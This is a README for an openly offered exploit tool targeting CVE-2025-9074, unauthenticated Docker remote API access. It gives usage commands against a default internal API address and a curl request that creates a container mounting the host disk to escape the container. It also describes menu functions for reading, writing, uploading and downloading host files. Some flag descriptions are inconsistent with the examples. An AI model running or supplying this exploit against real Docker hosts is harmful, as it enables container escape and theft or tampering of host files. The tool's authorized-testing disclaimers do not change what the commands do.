Share
## https://sploitus.com/exploit?id=F1CD0AD0-7ECC-5EC8-AF04-4339D5F6A650
# CVE-2025-9074 Docker Container Command Execution Tool

A powerful Docker remote API vulnerability exploitation tool for security research and testing related to the CVE-2025-9074 vulnerability. ## Key Features

βœ… **Full-automatic container lifecycle management**: Automatically creates temporary containers and cleans up after operations without leaving traces.
βœ… **Intelligent path handling**: Automatically identifies and converts Windows paths to Docker-mounted formats.
βœ… **Full-automatic operation**: No need to manually enter complex commands; menu-style interaction allows one-click file operations.
βœ… **Cross-platform compatibility**: Perfectly supports Windows and Linux systems.





## Features

- **Container Operations**
  - View running containers
  - View all containers (including stopped ones)
  - Create new containers
  - Stop containers
  - Delete containers
  - Execute single commands
  - Interactive terminal (requires the docker library)

- **Image Management**
  - View local images
  - Pull new images
  - Delete images

- **Host Machine File Operations**
  - Upload files to the host machine
  - Download files from the host machine
  - Read the content of host machine files
  - Write files to the host machine
  - Automatically handle Windows Docker Desktop path mapping





## Vulnerability Description

CVE-2025-9074 is a security vulnerability in the Docker remote API. Attackers can exploit this vulnerability by accessing the Docker API without authorization to:
- Execute arbitrary commands
- Create containers and mount host machine disks
- Achieve container escape
- Read/write host machine files





## Environment Requirements

- Python 3.6+

### Install Dependencies

Use `requirements.txt` to install all dependencies:

```bash
pip install -r requirements.txt
```

Or install manually:

```bash
pip install requests docker websocket-client
```

## Usage

### Basic Usage

```bash
python CVE-2025-9074-docker-exploit.py
```

### Command-Line Parameters

```bash
python CVE-2025-9074-docker-exploit.py [Options]

Options:
  -u, --url URL        Docker API URL (Default: http://192.168.65.7:2375)
  -c, --container-ID     Container ID
  -i, --interactive     Enter interactive terminal mode
  --shell SHELL        Shell command (Default: /bin/sh)
  -h, --help            Display help information
```

### Execute Single Command

```bash
python CVE-2025-9074-docker-exploit.py -c whoami
```

### Interactive Terminal

```bash
python CVE-2025-9074-docker-exploit.py -c -i
```

### Custom Docker API URL

```bash
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
```

## Detailed Features

### Container Operations

1. **View Running Containers**: Displays a list of all running containers.
2. **View All Containers**: Displays all containers (including those that are stopped).
3. **Create New Container**: Creates a new container using a specified image.
4. **Stop Containers**: Stops running containers.
5. **Delete Containers**: Deletes containers (can be forced to delete).
6. **Execute Single Command**: Executes a single command within a container.
7. **Interactive Terminal**: Access the interactive shell of a container.

### Image Management

1. **View Images**: Lists all local images.
2. **Pull Images**: Pull new images from Docker Hub.
3. **Delete Images**: Deletes local images.

### Host Machine File Operations

#### Upload Files to the Host Machine

```
1. Upload files to the host machine
Please enter the local file path: /path/to/local/file.txt
Please enter the target directory on the host machine: D:/temp
Please enter the file name (leave it blank to use the original name): 
```

#### Download Files from the Host Machine

```
2. Download files from the host machine
Please enter the path to the file on the host machine: D:/temp/file.txt
Please enter the local save path: /tmp
```

#### Read the Content of Host Machine Files

```
3. Read the content of host machine files
Please enter the path to the file on the host machine: D:/temp/file.txt
```

#### Write Files to the Host Machine

```
4. Write files to the host machine
Please enter the target directory on the host machine: D:/temp
Please enter the file content: Hello, World! ```

## Windows Docker Desktop Path Mapping

This tool automatically handles path mapping for Windows Docker Desktop:

| Windows Path | Docker Mount Path |
|--------------|-----------------|
| `D:`         | `/mnt/host/d`    |
| `D:\temp`    | `/mnt/host/d/temp` |
| `C:\Windows`  | `/mnt/host/c/Windows` |
| `C:\Users\test` | `/mnt/host/c/Users/test` |

Supported input formats:
- `D:` or `D:/`
- `D:\temp` or `D:/temp`
- `"D:\file.txt"` (enclosed)
- `'D:/file.txt'` (enclosed)

## Security Notes

⚠️ **Important Notice**:

1. **For Authorized Testing Only**: This tool is used solely for authorized security testing and educational purposes.
2. **Legal Compliance**: Ensure that you have explicit permission from the target system before using it.
3. **Isolated Environment**: It is recommended to use this tool in a isolated test environment.
4. **Permission Restrictions**: Windows Docker Desktop requires running as an administrator to write to the C drive.
5. **Do Not Abuse**: Using this tool without authorization may violate laws and regulations.

## Technical Principles

### Container Escape

Create a container through the Docker API and mount the host’s disk:

```bash
curl -X POST "http://:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'
```

### File Reading/Writing

Read and write host files by executing commands within the container:

```bash
# Write a file
echo "content" > /tmp/file.txt

# Read a file
cat /tmp/file.txt
```

## Troubleshooting

### Container Creation Failure (500 Error)

- Check whether the Docker API is accessible.
- Verify that the path format is correct.
- Confirm that the image exists.

### File Writing Failure

- Windows Docker Desktop requires running as an administrator.
- Check the permissions of the target directory.

### Unable to Start Interactive Terminal

- Make sure the docker library is installed: `pip install docker websocket-client`.
- Check whether the terminal supports interactive mode.

## Development and Testing

### Run Tests

```bash
python CVE-2025-9074-docker-exploit.py
```

### Code Structure

```
CVE-2025-9074-docker-exploit.py
β”œβ”€β”€ Container Management Functions
β”‚   β”œβ”€β”€ get_containers()
β”‚   β”œβ”€β”€ display_containers()
β”‚   β”œβ”€β”€ create_container()
β”‚   β”œβ”€β”€ stop_container()
β”‚   └── delete_container()
β”œβ”€β”€ Image Management Functions
β”‚   β”œβ”€β”€ get_images()
β”‚   β”œβ”€β”€ display_images()
β”‚   β”œβ”€β”€ pull_image()
β”‚   └── remove_image()
β”œβ”€β”€ Host File Operations Functions
β”‚   β”œβ”€β”€ upload_file_to_host()
β”‚   β”œβ”€β”€ download_file_from_host()
β”‚   β”œβ”€β”€ read_file_from_host()
β”‚   └── write_file_to_host()
└── Utility Functions
    β”œβ”€β”€ normalize_host_path()
    β”œβ”€β”€ create_container_with_mount()
    β”œβ”€β”€ start_container()
    └── stop_and_remove_container()
```

## Contributions

Feel free to submit issues and pull requests! ## License

This project is licensed for educational and security research purposes only. ## Disclaimer

This tool is used solely for authorized security testing and educational purposes. Users must bear all responsibilities and risks associated with using this tool. The author does not assume responsibility for any misuse or unauthorized use of this tool. ## References

- Details about the CVE-2025-9074 vulnerability
- Docker Remote API documentation
- Windows Docker Desktop path mapping rules

[source-iocs-preserved url=http://192.168.65.7:2375οΌ‰]